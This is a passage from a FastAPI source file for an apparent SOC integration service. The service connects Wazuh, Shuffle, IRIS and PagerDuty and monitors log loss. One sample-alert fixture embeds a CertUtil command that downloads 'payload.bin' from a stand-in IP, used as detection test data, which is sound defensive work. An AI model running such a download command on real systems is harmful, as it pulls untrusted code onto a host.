Няма описание

main.py 96KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270
37047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273127412751276127
71278127912801281128212831284128512861287128812891290129112921293129412951296129712981299130013011302130313041305130613071308130913101311131213131314131513161317131813191320132113221323132413251326132713281329133013311332133313341335133613371338133913401341134213431344134513461347134813491350135113521353135413551356135713581359136013611362136313641365136613671368136913701371137213731374137513761377137813791380138113821383138413851386138713881389139013911392139313941395139613971398139914001401140214031404140514061407140814091410141114121413141414151416141714181419142014211422142314241425142614271428142914301431143214331434143514361437143814391440144114421443144414451446144714481449145014511452145314541455145614571458145914601461146214631464146514661467146814691470147114721473147414751476147714781479148014811482148314841485148614871488148914901491149214931494149514961497149814991500150115021503150415051506150715081509151015111512151315141515151615171518151915201521152215231524152515261527152815291530153115321533153415351536153715381539154015411542154315441545154615471548154915501551155215531554155515561557155815591560156115621563156415651566156715681569157015711572157315741575157615771578157915801581158215831584158515861587158815891590159115921593159415951596159715981599160016011602160316041605160616071608160916101611161216131614161516161617161816191620162116221623162416251626162716281629163016311632163316341635163616371638163916401641164216431644164516461647164816491650165116521653165416551656165716581659166016611662166316641665166616671668166916701671167216731674167516761677167816791680168116821683168416851686168716881689169016911692169316941695169616971698169917001701170217031704170517061707170817091710171117121713171417151716171717181719172017211722172317241725172617271728172917301731173217331734173517361737173817391740174117421743174417451746174717481749175017511752175317541755175617571758175917601761176217631764176517661767176817691770177117721773177417751776177
71778177917801781178217831784178517861787178817891790179117921793179417951796179717981799180018011802180318041805180618071808180918101811181218131814181518161817181818191820182118221823182418251826182718281829183018311832183318341835183618371838183918401841184218431844184518461847184818491850185118521853185418551856185718581859186018611862186318641865186618671868186918701871187218731874187518761877187818791880188118821883188418851886188718881889189018911892189318941895189618971898189919001901190219031904190519061907190819091910191119121913191419151916191719181919192019211922192319241925192619271928192919301931193219331934193519361937193819391940194119421943194419451946194719481949195019511952195319541955195619571958195919601961196219631964196519661967196819691970197119721973197419751976197719781979198019811982198319841985198619871988198919901991199219931994199519961997199819992000200120022003200420052006200720082009201020112012201320142015201620172018201920202021202220232024202520262027202820292030203120322033203420352036203720382039204020412042204320442045204620472048204920502051205220532054205520562057205820592060206120622063206420652066206720682069207020712072207320742075207620772078207920802081208220832084208520862087208820892090209120922093209420952096209720982099210021012102210321042105210621072108210921102111211221132114211521162117211821192120212121222123212421252126212721282129213021312132213321342135213621372138213921402141214221432144214521462147214821492150215121522153215421552156215721582159216021612162216321642165216621672168216921702171217221732174217521762177217821792180218121822183218421852186218721882189219021912192219321942195219621972198219922002201220222032204220522062207220822092210221122122213221422152216221722182219222022212222222322242225222622272228222922302231223222332234223522362237223822392240224122422243224422452246224722482249225022512252225322542255225622572258225922602261226222632264226522662267226822692270227122722273227422752276227
722782279228022812282228322842285228622872288228922902291229222932294229522962297229822992300230123022303230423052306230723082309231023112312231323142315231623172318231923202321232223232324232523262327232823292330233123322333233423352336233723382339234023412342234323442345234623472348234923502351235223532354235523562357235823592360236123622363236423652366236723682369237023712372237323742375237623772378237923802381238223832384238523862387238823892390239123922393239423952396239723982399240024012402240324042405240624072408240924102411241224132414241524162417241824192420242124222423242424252426242724282429243024312432243324342435243624372438243924402441244224432444244524462447244824492450245124522453245424552456245724582459246024612462246324642465246624672468246924702471247224732474247524762477247824792480248124822483248424852486248724882489249024912492249324942495249624972498249925002501250225032504250525062507250825092510251125122513251425152516251725182519252025212522252325242525252625272528252925302531253225332534253525362537253825392540254125422543254425452546254725482549255025512552255325542555255625572558255925602561256225632564256525662567256825692570257125722573257425752576257725782579258025812582258325842585258625872588258925902591259225932594259525962597259825992600260126022603260426052606260726082609261026112612261326142615261626172618261926202621262226232624262526262627262826292630263126322633263426352636263726382639264026412642264326442645264626472648264926502651265226532654265526562657265826592660266126622663
  1. import asyncio
  2. import logging
  3. import os
  4. import re
  5. import shlex
  6. import subprocess
  7. import uuid
  8. from collections import deque
  9. from datetime import datetime, timedelta, timezone
  10. from pathlib import Path
  11. from psycopg import sql
  12. from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
  13. import csv
  14. import io
  15. from fastapi.responses import FileResponse, Response, StreamingResponse
  16. from fastapi.staticfiles import StaticFiles
  17. from app.adapters.abuseipdb import AbuseIpdbAdapter
  18. from app.adapters.geoip import GeoIpAdapter
  19. from app.adapters.iris import IrisAdapter
  20. from app.adapters.pagerduty import PagerDutyAdapter
  21. from app.adapters.shuffle import ShuffleAdapter
  22. from app.adapters.virustotal import VirusTotalAdapter
  23. from app.adapters.wazuh import WazuhAdapter
  24. from app.config import settings
  25. from app.db import get_conn, init_schema
  26. from app.models import (
  27. ActionCreateIncidentRequest,
  28. ApiResponse,
  29. CDetectionEvaluateRequest,
  30. IocEnrichRequest,
  31. IocEvaluateRequest,
  32. IrisAlertCreateRequest,
  33. IrisTicketCreateRequest,
  34. LogLossCheckRequest,
  35. LogLossStreamCheck,
  36. SimLogRunRequest,
  37. ShuffleLoginRequest,
  38. ShuffleProxyRequest,
  39. TriggerShuffleRequest,
  40. WazuhIngestRequest,
  41. )
  42. from app.repositories.mvp_repo import MvpRepository
  43. from app.routes.mvp import build_mvp_router
  44. from app.security import require_internal_api_key
  45. from app.services.mvp_service import MvpService
  46. from app.services.c_detection_service import CDetectionService
# Application object and module-wide logger.
app = FastAPI(title=settings.app_name, version="0.1.0")
logger = logging.getLogger(__name__)

# Filesystem locations: bundled UI, simulation scripts, and per-run sim logs.
UI_DIR = Path(__file__).resolve().parent / "ui"
UI_ASSETS_DIR = UI_DIR / "assets"
SIM_SCRIPTS_DIR = Path("/app/scripts")
SIM_RUN_LOGS_DIR = Path("/tmp/soc-integrator-sim-logs")

# Upstream adapters, each configured from application settings.
wazuh_adapter = WazuhAdapter(
    base_url=settings.wazuh_base_url,
    username=settings.wazuh_username,
    password=settings.wazuh_password,
    indexer_url=settings.wazuh_indexer_url,
    indexer_username=settings.wazuh_indexer_username,
    indexer_password=settings.wazuh_indexer_password,
)
shuffle_adapter = ShuffleAdapter(
    base_url=settings.shuffle_base_url,
    api_key=settings.shuffle_api_key,
)
pagerduty_adapter = PagerDutyAdapter(
    base_url=settings.pagerduty_base_url,
    api_key=settings.pagerduty_api_key,
)
iris_adapter = IrisAdapter(
    base_url=settings.iris_base_url,
    api_key=settings.iris_api_key,
)
virustotal_adapter = VirusTotalAdapter(
    base_url=settings.virustotal_base_url,
    api_key=settings.virustotal_api_key,
)
abuseipdb_adapter = AbuseIpdbAdapter(
    base_url=settings.abuseipdb_base_url,
    api_key=settings.abuseipdb_api_key,
)
geoip_adapter = GeoIpAdapter(
    provider=settings.geoip_provider,
    cache_ttl_seconds=settings.geoip_cache_ttl_seconds,
)

# Repository and service-layer wiring (shared repo across both services).
repo = MvpRepository()
mvp_service = MvpService(
    repo=repo,
    wazuh_adapter=wazuh_adapter,
    shuffle_adapter=shuffle_adapter,
    iris_adapter=iris_adapter,
    pagerduty_adapter=pagerduty_adapter,
)
c_detection_service = CDetectionService(
    repo=repo,
    geoip_adapter=geoip_adapter,
)

# Mount the MVP API router and the static UI asset directory.
app.include_router(build_mvp_router(mvp_service, require_internal_api_key))
app.mount("/ui/assets", StaticFiles(directory=str(UI_ASSETS_DIR)), name="ui-assets")
  99. @app.middleware("http")
  100. async def ui_no_cache_middleware(request: Request, call_next):
  101. response: Response = await call_next(request)
  102. if request.url.path == "/ui" or request.url.path.startswith("/ui/assets/"):
  103. response.headers["Cache-Control"] = "no-store, no-cache, must-revalidate, max-age=0"
  104. response.headers["Pragma"] = "no-cache"
  105. response.headers["Expires"] = "0"
  106. return response
# Built-in stream checks used when a log-loss request supplies no streams of
# its own. Each entry names a telemetry stream, the Wazuh query expected to
# match it, and the minimum alert count expected within the check window.
DEFAULT_LOG_LOSS_STREAMS: list[dict[str, object]] = [
    {
        "name": "fortigate",
        "query": "full_log:fortigate OR full_log:FGT80F OR full_log:FGT60F OR full_log:FGT40F OR full_log:FGT501E",
        "min_count": 1,
    },
    {
        "name": "windows_agent",
        "query": "full_log:windows_agent OR full_log:windows",
        "min_count": 1,
    },
    {
        "name": "vmware",
        "query": "full_log:vmware",
        "min_count": 1,
    },
    {
        "name": "log_monitor",
        "query": "full_log:log_monitor OR rule.id:100411",
        "min_count": 1,
    },
]
async def _execute_log_loss_check(
    req: LogLossCheckRequest,
    create_ticket: bool,
) -> dict[str, object]:
    """Count recent Wazuh alerts per stream and flag streams below their minimum.

    Args:
        req: Check request; ``minutes`` is the lookback window and ``streams``
            optionally overrides DEFAULT_LOG_LOSS_STREAMS.
        create_ticket: When True and at least one stream shows loss, attempt
            to open an IRIS case (subject to the configured cooldown).

    Returns:
        A dict with ``checked_at``, ``minutes``, per-stream ``streams`` items,
        a ``summary`` block, and (when attempted) a ``ticket`` block.
    """
    minutes = max(1, int(req.minutes))
    # Fall back to the built-in stream definitions when the request names none.
    streams = req.streams or [LogLossStreamCheck(**item) for item in DEFAULT_LOG_LOSS_STREAMS]
    items: list[dict[str, object]] = []
    loss_count = 0
    error_count = 0
    loss_stream_names: list[str] = []
    for stream in streams:
        min_count = max(0, int(stream.min_count))
        try:
            observed = await wazuh_adapter.count_alerts(query=stream.query, minutes=minutes)
            is_loss = observed < min_count
            if is_loss:
                loss_count += 1
                loss_stream_names.append(stream.name)
            items.append(
                {
                    "name": stream.name,
                    "query": stream.query,
                    "minutes": minutes,
                    "min_count": min_count,
                    "observed_count": observed,
                    "status": "loss" if is_loss else "ok",
                }
            )
        except Exception as exc:
            # A failed query is reported per-stream instead of failing the whole check.
            error_count += 1
            items.append(
                {
                    "name": stream.name,
                    "query": stream.query,
                    "minutes": minutes,
                    "min_count": min_count,
                    "observed_count": None,
                    "status": "error",
                    "error": str(exc),
                }
            )
    summary = {
        "total_streams": len(items),
        "loss_streams": loss_count,
        "error_streams": error_count,
        "all_ok": loss_count == 0 and error_count == 0,
    }
    ticket_data: dict[str, object] | None = None
    if create_ticket and loss_count > 0:
        cooldown = max(0, int(settings.log_loss_monitor_ticket_cooldown_seconds))
        now_ts = datetime.now(timezone.utc).timestamp()
        state = app.state.log_loss_monitor_state
        last_ticket_ts = float(state.get("last_ticket_ts", 0.0) or 0.0)
        # Suppress a new ticket while the previous one is inside the cooldown window.
        in_cooldown = cooldown > 0 and (now_ts - last_ticket_ts) < cooldown
        if not in_cooldown:
            title = f"Log loss detected ({loss_count} stream(s))"
            description = (
                f"Log-loss monitor detected missing telemetry in the last {minutes} minute(s). "
                f"Affected streams: {', '.join(loss_stream_names)}."
            )
            case_payload = {
                "case_name": title,
                "case_description": description,
                "case_customer": settings.iris_default_customer_id,
                "case_soc_id": settings.iris_default_soc_id,
            }
            try:
                iris_result = await iris_adapter.create_case(case_payload)
                # Only start the cooldown clock after a successful case creation.
                state["last_ticket_ts"] = now_ts
                ticket_data = {"created": True, "iris": iris_result}
            except Exception as exc:
                ticket_data = {"created": False, "error": str(exc)}
        else:
            ticket_data = {
                "created": False,
                "skipped": "cooldown_active",
                "cooldown_seconds": cooldown,
                "last_ticket_ts": last_ticket_ts,
            }
    result: dict[str, object] = {
        "checked_at": datetime.now(timezone.utc).isoformat(),
        "minutes": minutes,
        "summary": summary,
        "streams": items,
    }
    if ticket_data is not None:
        result["ticket"] = ticket_data
    return result
async def _log_loss_monitor_loop() -> None:
    """Background task: run the log-loss check on a fixed interval forever.

    Each iteration records start/finish timestamps, the last result or error,
    and a running flag into ``app.state.log_loss_monitor_state`` so the API/UI
    can report the monitor's latest status.
    """
    # Clamp the interval to at least 5 seconds to avoid a hot loop on bad config.
    interval = max(5, int(settings.log_loss_monitor_interval_seconds))
    while True:
        started_at = datetime.now(timezone.utc).isoformat()
        try:
            app.state.log_loss_monitor_state["running"] = True
            app.state.log_loss_monitor_state["last_started_at"] = started_at
            req = LogLossCheckRequest(minutes=max(1, int(settings.log_loss_monitor_window_minutes)))
            result = await _execute_log_loss_check(
                req=req,
                create_ticket=bool(settings.log_loss_monitor_create_iris_ticket),
            )
            app.state.log_loss_monitor_state["last_status"] = "ok"
            app.state.log_loss_monitor_state["last_result"] = result
            app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
            logger.info(
                "log-loss monitor checked=%s loss=%s errors=%s",
                result.get("summary", {}).get("total_streams", 0),
                result.get("summary", {}).get("loss_streams", 0),
                result.get("summary", {}).get("error_streams", 0),
            )
        except Exception as exc:
            # Record the failure but keep the loop alive for the next interval.
            app.state.log_loss_monitor_state["last_status"] = "error"
            app.state.log_loss_monitor_state["last_error"] = str(exc)
            app.state.log_loss_monitor_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
            logger.exception("log-loss monitor failed: %s", exc)
        finally:
            app.state.log_loss_monitor_state["running"] = False
        await asyncio.sleep(interval)
async def _wazuh_auto_sync_loop() -> None:
    """Background task: periodically pull Wazuh alerts through the MVP service.

    Each iteration records start/finish timestamps, the last result or error,
    and a running flag into ``app.state.wazuh_auto_sync_state``.
    """
    # Clamp the interval to at least 5 seconds to avoid a hot loop on bad config.
    interval = max(5, int(settings.wazuh_auto_sync_interval_seconds))
    while True:
        started_at = datetime.now(timezone.utc).isoformat()
        try:
            app.state.wazuh_auto_sync_state["running"] = True
            app.state.wazuh_auto_sync_state["last_started_at"] = started_at
            result = await mvp_service.sync_wazuh_alerts(
                query=settings.wazuh_auto_sync_query,
                limit=settings.wazuh_auto_sync_limit,
                minutes=settings.wazuh_auto_sync_minutes,
            )
            app.state.wazuh_auto_sync_state["last_status"] = "ok"
            app.state.wazuh_auto_sync_state["last_result"] = result
            app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
            logger.info(
                "wazuh auto-sync processed=%s ingested=%s skipped=%s failed=%s ioc_evaluated=%s ioc_matched=%s ioc_rejected=%s",
                result.get("processed", 0),
                result.get("ingested", 0),
                result.get("skipped_existing", 0),
                result.get("failed", 0),
                result.get("ioc_evaluated", 0),
                result.get("ioc_matched", 0),
                result.get("ioc_rejected", 0),
            )
        except Exception as exc:
            # Record the failure but keep the loop alive for the next interval.
            app.state.wazuh_auto_sync_state["last_status"] = "error"
            app.state.wazuh_auto_sync_state["last_error"] = str(exc)
            app.state.wazuh_auto_sync_state["last_finished_at"] = datetime.now(timezone.utc).isoformat()
            logger.exception("wazuh auto-sync failed: %s", exc)
        finally:
            app.state.wazuh_auto_sync_state["running"] = False
        await asyncio.sleep(interval)
  279. def _c_match_to_incident_event(match: dict[str, object]) -> dict[str, object]:
  280. event = dict(match.get("event") or {})
  281. usecase_id = str(match.get("usecase_id") or "C-unknown")
  282. section = str(match.get("section") or "c")
  283. severity = str(match.get("severity") or "medium")
  284. entity = str(match.get("entity") or "unknown")
  285. evidence = dict(match.get("evidence") or {})
  286. source = str(event.get("source") or "wazuh")
  287. timestamp = str(event.get("timestamp") or datetime.now(timezone.utc).isoformat())
  288. event_id = str(event.get("event_id") or f"{usecase_id}-{int(datetime.now(timezone.utc).timestamp())}")
  289. payload = dict(event.get("payload") or {})
  290. asset = dict(event.get("asset") or {})
  291. network = dict(event.get("network") or {})
  292. event_type = "c2_credential_abuse"
  293. if section == "c1":
  294. event_type = "c1_impossible_travel"
  295. elif section == "c3":
  296. event_type = "c3_lateral_movement"
  297. title = f"{usecase_id} detection for {entity}"
  298. description = f"{usecase_id} matched for entity={entity}. evidence={evidence}"
  299. tags = list(event.get("tags") or [])
  300. tags.extend(["appendix_c", usecase_id.lower(), section])
  301. return {
  302. "source": source,
  303. "event_type": event_type,
  304. "event_id": event_id,
  305. "timestamp": timestamp,
  306. "severity": severity,
  307. "title": title,
  308. "description": description,
  309. "asset": asset,
  310. "network": network,
  311. "tags": sorted(set(tags)),
  312. "risk_context": {"appendix_c_usecase": usecase_id},
  313. "raw": event.get("raw") or {},
  314. "payload": payload,
  315. }
@app.on_event("startup")
async def startup() -> None:
    """Initialize schema/policy, seed per-feature runtime state, start background loops."""
    init_schema()
    repo.ensure_policy()
    # Mutable runtime state for the Wazuh auto-sync loop.
    app.state.wazuh_auto_sync_state = {
        "running": False,
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
    }
    # Mutable runtime state for the log-loss monitor (tracks ticket cooldown too).
    app.state.log_loss_monitor_state = {
        "running": False,
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
        "last_ticket_ts": 0.0,
    }
    # State for Appendix-C detections; ticket cooldowns are tracked per key.
    app.state.c_detection_state = {
        "last_status": None,
        "last_started_at": None,
        "last_finished_at": None,
        "last_error": None,
        "last_result": None,
        "last_ticket_ts_by_key": {},
    }
    app.state.systems_monitor_state = {
        "last_ok_at": {},
    }
    # Registry of simulation subprocess runs; ensure the log directory exists.
    app.state.sim_runs = {}
    SIM_RUN_LOGS_DIR.mkdir(parents=True, exist_ok=True)
    # Background loops are opt-in via settings.
    if settings.wazuh_auto_sync_enabled:
        app.state.wazuh_auto_sync_task = asyncio.create_task(_wazuh_auto_sync_loop())
        logger.info(
            "wazuh auto-sync enabled interval=%ss limit=%s minutes=%s query=%s",
            settings.wazuh_auto_sync_interval_seconds,
            settings.wazuh_auto_sync_limit,
            settings.wazuh_auto_sync_minutes,
            settings.wazuh_auto_sync_query,
        )
    if settings.log_loss_monitor_enabled:
        app.state.log_loss_monitor_task = asyncio.create_task(_log_loss_monitor_loop())
        logger.info(
            "log-loss monitor enabled interval=%ss window=%sm create_iris_ticket=%s cooldown=%ss",
            settings.log_loss_monitor_interval_seconds,
            settings.log_loss_monitor_window_minutes,
            settings.log_loss_monitor_create_iris_ticket,
            settings.log_loss_monitor_ticket_cooldown_seconds,
        )
  368. @app.on_event("shutdown")
  369. async def shutdown() -> None:
  370. task = getattr(app.state, "wazuh_auto_sync_task", None)
  371. if task:
  372. task.cancel()
  373. try:
  374. await task
  375. except asyncio.CancelledError:
  376. pass
  377. ll_task = getattr(app.state, "log_loss_monitor_task", None)
  378. if ll_task:
  379. ll_task.cancel()
  380. try:
  381. await ll_task
  382. except asyncio.CancelledError:
  383. pass
  384. sim_runs = getattr(app.state, "sim_runs", {})
  385. for run in sim_runs.values():
  386. process = run.get("process")
  387. if process and process.poll() is None:
  388. process.terminate()
  389. @app.get(
  390. "/ui",
  391. summary="SOC Integrator UI",
  392. description="Serve the built-in Alpine.js operations console.",
  393. include_in_schema=False,
  394. )
  395. async def ui_index() -> FileResponse:
  396. if not UI_DIR.exists():
  397. raise HTTPException(status_code=404, detail="UI is not available in this build")
  398. return FileResponse(UI_DIR / "index.html")
  399. @app.get(
  400. "/health",
  401. response_model=ApiResponse,
  402. summary="Service health",
  403. description="Return soc-integrator service identity and configured upstream targets.",
  404. )
  405. async def health() -> ApiResponse:
  406. return ApiResponse(
  407. data={
  408. "service": settings.app_name,
  409. "env": settings.app_env,
  410. "targets": {
  411. "wazuh": settings.wazuh_base_url,
  412. "shuffle": settings.shuffle_base_url,
  413. "pagerduty": settings.pagerduty_base_url,
  414. "iris": settings.iris_base_url,
  415. },
  416. }
  417. )
  418. def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
  419. src_payload = dict(payload.payload or {})
  420. src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
  421. src_payload.setdefault("id", payload.alert_id)
  422. src_payload.setdefault(
  423. "rule",
  424. {
  425. "id": payload.rule_id or "unknown",
  426. "level": payload.severity if payload.severity is not None else 5,
  427. "description": payload.title or "Wazuh alert",
  428. },
  429. )
  430. return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
  431. def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
  432. normalized = {
  433. "source": payload.source,
  434. "alert_id": payload.alert_id,
  435. "rule_id": payload.rule_id,
  436. "severity": payload.severity,
  437. "title": payload.title,
  438. "payload": payload.payload,
  439. }
  440. hit = _build_wazuh_hit_from_ingest(payload)
  441. normalized_event = mvp_service.normalize_wazuh_hit(hit)
  442. return {
  443. "normalized": normalized,
  444. "normalized_event": normalized_event,
  445. }
  446. @app.post(
  447. "/ingest/wazuh-alert",
  448. response_model=ApiResponse,
  449. summary="Normalize Wazuh alert",
  450. description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
  451. )
  452. async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
  453. return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
@app.get(
    "/ingest/wazuh-alert/samples",
    response_model=ApiResponse,
    summary="Sample normalization cases",
    description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
)
async def ingest_wazuh_alert_samples() -> ApiResponse:
    """Build canned ingest requests and run each through the normalizer."""
    # One representative sample per use case (A1 DNS IOC, B1 ESXi SSH,
    # B3 CertUtil download, C1 impossible travel).
    sample_payloads = [
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110302",
            alert_id="sample-a1-02",
            severity=8,
            title="A1 production: DNS IOC domain match event",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
                "agent": {"name": "dns-fw-01", "id": "001"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110402",
            alert_id="sample-b1-02",
            severity=8,
            title="B1 production: ESXi SSH enabled",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
                "agent": {"name": "esxi-01", "id": "002"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110426",
            alert_id="sample-b3-06",
            severity=8,
            title="B3 production: CertUtil download pattern",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
                "agent": {"name": "win-sysmon-01", "id": "003"},
            },
        ),
        WazuhIngestRequest(
            source="wazuh",
            rule_id="110501",
            alert_id="sample-c1-01",
            severity=12,
            title="C1 production: Impossible travel",
            payload={
                "@timestamp": datetime.now(timezone.utc).isoformat(),
                "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
                "agent": {"name": "fgt-vpn-01", "id": "004"},
            },
        ),
    ]
    # Pair each request with the normalizer's actual output for that request.
    cases = []
    for item in sample_payloads:
        cases.append(
            {
                "name": str(item.alert_id),
                "request": item.model_dump(mode="json"),
                "result": _normalize_wazuh_ingest_payload(item),
            }
        )
    return ApiResponse(data={"cases": cases, "count": len(cases)})
  521. @app.post(
  522. "/action/create-incident",
  523. response_model=ApiResponse,
  524. summary="Create PagerDuty incident",
  525. description="Create an incident in PagerDuty (stub or real integration) from request payload.",
  526. )
  527. async def create_incident(payload: ActionCreateIncidentRequest) -> ApiResponse:
  528. incident_payload = {
  529. "title": payload.title,
  530. "urgency": payload.severity,
  531. "incident_key": payload.dedupe_key,
  532. "body": payload.payload,
  533. "source": payload.source,
  534. }
  535. try:
  536. pd_result = await pagerduty_adapter.create_incident(incident_payload)
  537. except Exception as exc:
  538. raise HTTPException(status_code=502, detail=f"PagerDuty call failed: {exc}") from exc
  539. return ApiResponse(data={"pagerduty": pd_result})
  540. @app.post(
  541. "/action/trigger-shuffle",
  542. response_model=ApiResponse,
  543. summary="Trigger Shuffle workflow",
  544. description="Execute a Shuffle workflow by ID with execution_argument payload.",
  545. )
  546. async def trigger_shuffle(payload: TriggerShuffleRequest) -> ApiResponse:
  547. try:
  548. shuffle_result = await shuffle_adapter.trigger_workflow(
  549. workflow_id=payload.workflow_id,
  550. payload=payload.execution_argument,
  551. )
  552. except Exception as exc:
  553. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  554. return ApiResponse(data={"shuffle": shuffle_result})
  555. @app.get(
  556. "/shuffle/health",
  557. response_model=ApiResponse,
  558. summary="Shuffle health",
  559. description="Check Shuffle backend health endpoint through adapter connectivity.",
  560. )
  561. async def shuffle_health() -> ApiResponse:
  562. try:
  563. result = await shuffle_adapter.health()
  564. except Exception as exc:
  565. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  566. return ApiResponse(data={"shuffle": result})
  567. @app.get(
  568. "/shuffle/auth-test",
  569. response_model=ApiResponse,
  570. summary="Shuffle auth test",
  571. description="Validate Shuffle API key authentication.",
  572. )
  573. async def shuffle_auth_test() -> ApiResponse:
  574. try:
  575. result = await shuffle_adapter.auth_test()
  576. except Exception as exc:
  577. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  578. return ApiResponse(data={"shuffle": result})
  579. @app.post(
  580. "/shuffle/login",
  581. response_model=ApiResponse,
  582. summary="Shuffle login",
  583. description="Login to Shuffle with username/password and return auth response.",
  584. )
  585. async def shuffle_login(payload: ShuffleLoginRequest) -> ApiResponse:
  586. try:
  587. result = await shuffle_adapter.login(payload.username, payload.password)
  588. except Exception as exc:
  589. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  590. return ApiResponse(data={"shuffle": result})
  591. @app.post(
  592. "/shuffle/generate-apikey",
  593. response_model=ApiResponse,
  594. summary="Generate Shuffle API key",
  595. description="Login using provided or configured credentials and generate a Shuffle API key.",
  596. )
  597. async def shuffle_generate_apikey(payload: ShuffleLoginRequest | None = None) -> ApiResponse:
  598. username = payload.username if payload else settings.shuffle_username
  599. password = payload.password if payload else settings.shuffle_password
  600. if not username or not password:
  601. raise HTTPException(
  602. status_code=400,
  603. detail="Missing shuffle credentials. Provide username/password in body or set SHUFFLE_USERNAME and SHUFFLE_PASSWORD.",
  604. )
  605. try:
  606. result = await shuffle_adapter.generate_apikey_from_login(username, password)
  607. except Exception as exc:
  608. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  609. return ApiResponse(data={"shuffle": result})
  610. @app.get(
  611. "/shuffle/workflows",
  612. response_model=ApiResponse,
  613. summary="List Shuffle workflows",
  614. description="List available workflows in Shuffle using configured API key.",
  615. )
  616. async def shuffle_workflows() -> ApiResponse:
  617. try:
  618. result = await shuffle_adapter.list_workflows()
  619. except Exception as exc:
  620. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  621. return ApiResponse(data={"shuffle": result})
  622. @app.get(
  623. "/shuffle/workflows/{workflow_id}",
  624. response_model=ApiResponse,
  625. summary="Get Shuffle workflow",
  626. description="Get a single Shuffle workflow definition by workflow ID.",
  627. )
  628. async def shuffle_workflow(workflow_id: str) -> ApiResponse:
  629. try:
